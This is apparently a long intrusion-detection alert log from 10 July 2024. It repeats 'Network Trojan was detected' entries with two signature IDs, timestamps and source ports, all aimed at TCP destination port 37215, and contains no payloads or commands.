                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.330955
                  SID:2829579
                  Source Port:58126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.290306
                  SID:2835222
                  Source Port:43218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.381541
                  SID:2835222
                  Source Port:43304
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.882242
                  SID:2829579
                  Source Port:46406
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.672861
                  SID:2829579
                  Source Port:48054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.826364
                  SID:2835222
                  Source Port:46922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.230716
                  SID:2835222
                  Source Port:32960
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.828822
                  SID:2835222
                  Source Port:46468
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.281156
                  SID:2829579
                  Source Port:35624
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.283618
                  SID:2835222
                  Source Port:42306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.867621
                  SID:2829579
                  Source Port:38386
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.491395
                  SID:2835222
                  Source Port:36548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.019477
                  SID:2835222
                  Source Port:42346
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:57.662130
                  SID:2835222
                  Source Port:50752
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.156575
                  SID:2835222
                  Source Port:34242
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.281691
                  SID:2829579
                  Source Port:39398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.844780
                  SID:2835222
                  Source Port:33518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.341408
                  SID:2835222
                  Source Port:42568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.452806
                  SID:2835222
                  Source Port:42272
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853963
                  SID:2835222
                  Source Port:47084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207710
                  SID:2835222
                  Source Port:36718
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.617343
                  SID:2829579
                  Source Port:57532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.599203
                  SID:2829579
                  Source Port:54152
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.879601
                  SID:2829579
                  Source Port:47982
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.668084
                  SID:2829579
                  Source Port:60586
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.941876
                  SID:2835222
                  Source Port:56772
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.102240
                  SID:2835222
                  Source Port:41710
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.853234
                  SID:2835222
                  Source Port:39190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.441172
                  SID:2835222
                  Source Port:44264
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.877768
                  SID:2829579
                  Source Port:51280
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.188794
                  SID:2835222
                  Source Port:57726
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.651958
                  SID:2829579
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:51.964382
                  SID:2835222
                  Source Port:57326
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:53.230635
                  SID:2829579
                  Source Port:37826
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.736673
                  SID:2829579
                  Source Port:34502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.040867
                  SID:2835222
                  Source Port:41060
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852181
                  SID:2829579
                  Source Port:34576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.366891
                  SID:2835222
                  Source Port:42180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.950473
                  SID:2829579
                  Source Port:53008
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.850928
                  SID:2829579
                  Source Port:39514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.169904
                  SID:2829579
                  Source Port:33824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.494358
                  SID:2835222
                  Source Port:56132
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.834313
                  SID:2835222
                  Source Port:44426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.929335
                  SID:2835222
                  Source Port:33076
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.173254
                  SID:2835222
                  Source Port:46764
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.551346
                  SID:2835222
                  Source Port:39474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.311200
                  SID:2829579
                  Source Port:38574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.587668
                  SID:2835222
                  Source Port:43278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:27.074903
                  SID:2835222
                  Source Port:56446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.389134
                  SID:2835222
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.778157
                  SID:2835222
                  Source Port:51702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.732264
                  SID:2829579
                  Source Port:37270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.291888
                  SID:2835222
                  Source Port:57384
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.873809
                  SID:2835222
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.611228
                  SID:2835222
                  Source Port:49514
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.610911
                  SID:2835222
                  Source Port:51300
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.803873
                  SID:2829579
                  Source Port:56818
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.629706
                  SID:2829579
                  Source Port:48608
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.594360
                  SID:2829579
                  Source Port:40092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.403967
                  SID:2835222
                  Source Port:56848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.062116
                  SID:2835222
                  Source Port:57972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.920658
                  SID:2829579
                  Source Port:44578
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.387027
                  SID:2835222
                  Source Port:60798
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.525645
                  SID:2829579
                  Source Port:60094
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.298616
                  SID:2829579
                  Source Port:36742
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.954167
                  SID:2835222
                  Source Port:36000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.532639
                  SID:2835222
                  Source Port:57594
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.609585
                  SID:2835222
                  Source Port:50018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.533067
                  SID:2835222
                  Source Port:38150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.624887
                  SID:2835222
                  Source Port:48044
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.663185
                  SID:2829579
                  Source Port:60348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.219271
                  SID:2829579
                  Source Port:41670
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.392423
                  SID:2829579
                  Source Port:39978
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.043908
                  SID:2835222
                  Source Port:39516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.845441
                  SID:2829579
                  Source Port:56316
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.410594
                  SID:2829579
                  Source Port:33056
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.451424
                  SID:2835222
                  Source Port:52628
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:07.353904
                  SID:2829579
                  Source Port:49906
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:17.067488
                  SID:2829579
                  Source Port:52558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.423540
                  SID:2829579
                  Source Port:37086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.998710
                  SID:2829579
                  Source Port:51480
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:19.264327
                  SID:2835222
                  Source Port:54448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.349242
                  SID:2835222
                  Source Port:52150
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.613814
                  SID:2835222
                  Source Port:38064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.470817
                  SID:2829579
                  Source Port:39312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.538125
                  SID:2829579
                  Source Port:55246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.962924
                  SID:2835222
                  Source Port:42348
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:24.993210
                  SID:2829579
                  Source Port:56922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.278406
                  SID:2835222
                  Source Port:40722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.602329
                  SID:2829579
                  Source Port:43760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.473922
                  SID:2835222
                  Source Port:34694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.568589
                  SID:2829579
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.880093
                  SID:2835222
                  Source Port:49258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.425783
                  SID:2829579
                  Source Port:53362
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:49.816835
                  SID:2835222
                  Source Port:48126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.207017
                  SID:2835222
                  Source Port:54912
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.416063
                  SID:2835222
                  Source Port:33224
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030182
                  SID:2829579
                  Source Port:52126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.553894
                  SID:2829579
                  Source Port:39116
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.872780
                  SID:2829579
                  Source Port:56448
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.879237
                  SID:2829579
                  Source Port:45478
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.655390
                  SID:2835222
                  Source Port:34018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:31.094211
                  SID:2829579
                  Source Port:34828
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.577116
                  SID:2829579
                  Source Port:50956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.131322
                  SID:2829579
                  Source Port:58760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.827711
                  SID:2835222
                  Source Port:59276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.668696
                  SID:2829579
                  Source Port:56854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.550813
                  SID:2835222
                  Source Port:36170
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.794160
                  SID:2829579
                  Source Port:54088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.878733
                  SID:2829579
                  Source Port:46574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.959162
                  SID:2835222
                  Source Port:44654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.460773
                  SID:2829579
                  Source Port:33276
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:34.117875
                  SID:2829579
                  Source Port:45148
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.593269
                  SID:2829579
                  Source Port:33968
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.482500
                  SID:2829579
                  Source Port:35136
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:11.544699
                  SID:2835222
                  Source Port:57790
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:36.280780
                  SID:2835222
                  Source Port:39816
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:08.417840
                  SID:2829579
                  Source Port:56046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:55.364667
                  SID:2829579
                  Source Port:59714
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:14.622208
                  SID:2835222
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.563046
                  SID:2829579
                  Source Port:41286
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.664238
                  SID:2829579
                  Source Port:55952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.305077
                  SID:2835222
                  Source Port:43196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.837322
                  SID:2835222
                  Source Port:36854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.118074
                  SID:2829579
                  Source Port:51956
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.536872
                  SID:2829579
                  Source Port:40990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.330263
                  SID:2835222
                  Source Port:52590
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:33.231077
                  SID:2835222
                  Source Port:57538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.528141
                  SID:2829579
                  Source Port:47672
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.159538
                  SID:2835222
                  Source Port:51652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.652000
                  SID:2835222
                  Source Port:58394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.438219
                  SID:2835222
                  Source Port:45854
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:26.588414
                  SID:2835222
                  Source Port:55542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:33.719591
                  SID:2829579
                  Source Port:35240
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:11.162688
                  SID:2835222
                  Source Port:52278
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:41.439991
                  SID:2829579
                  Source Port:50036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.596186
                  SID:2835222
                  Source Port:48588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:47.914277
                  SID:2829579
                  Source Port:56046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:45.632406
                  SID:2835222
                  Source Port:51470
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:38.637224
                  SID:2829579
                  Source Port:35940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.698482
                  SID:2829579
                  Source Port:39376
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.598272
                  SID:2835222
                  Source Port:46078
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:42.374424
                  SID:2829579
                  Source Port:37576
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.264063
                  SID:2829579
                  Source Port:35464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.535302
                  SID:2829579
                  Source Port:59354
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:17.959053
                  SID:2829579
                  Source Port:33844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.879518
                  SID:2829579
                  Source Port:48232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:28.174408
                  SID:2835222
                  Source Port:53574
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2835222
                  Source Port:39746
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:22.455545
                  SID:2835222
                  Source Port:57702
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:23.900911
                  SID:2835222
                  Source Port:56990
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.647460
                  SID:2829579
                  Source Port:37018
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:13.852643
                  SID:2829579
                  Source Port:55654
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.875124
                  SID:2829579
                  Source Port:45544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.530342
                  SID:2829579
                  Source Port:37680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:32.532227
                  SID:2829579
                  Source Port:36046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.196006
                  SID:2829579
                  Source Port:45538
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.547528
                  SID:2829579
                  Source Port:51728
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.282645
                  SID:2835222
                  Source Port:45092
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:10.595154
                  SID:2829579
                  Source Port:40464
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:15.812623
                  SID:2829579
                  Source Port:58808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:25.429135
                  SID:2835222
                  Source Port:49128
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.867822
                  SID:2835222
                  Source Port:41372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.787394
                  SID:2829579
                  Source Port:38350
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:20.434935
                  SID:2835222
                  Source Port:59088
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.119674
                  SID:2835222
                  Source Port:38270
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:28.841880
                  SID:2835222
                  Source Port:39308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:14.853169
                  SID:2829579
                  Source Port:54518
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:22.234454
                  SID:2829579
                  Source Port:47338
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:36.342086
                  SID:2829579
                  Source Port:56678
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.914559
                  SID:2829579
                  Source Port:44736
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:18.030544
                  SID:2829579
                  Source Port:50648
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:29.883376
                  SID:2835222
                  Source Port:55194
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:31.459997
                  SID:2829579
                  Source Port:36588
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:30.562651
                  SID:2835222
                  Source Port:41556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:23.348963
                  SID:2829579
                  Source Port:47282
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:34.234133
                  SID:2835222
                  Source Port:49172
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:05.230730
                  SID:2829579
                  Source Port:33492
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:43.681419
                  SID:2835222
                  Source Port:58754
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:59.835499
                  SID:2829579
                  Source Port:45038
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:52.033038
                  SID:2829579
                  Source Port:38918
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:27:13.988914
                  SID:2829579
                  Source Port:54140
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:07/10/24-08:26:20.179402
                  SID:2835222
                  Source Port:47214
                  Destination Port:37215
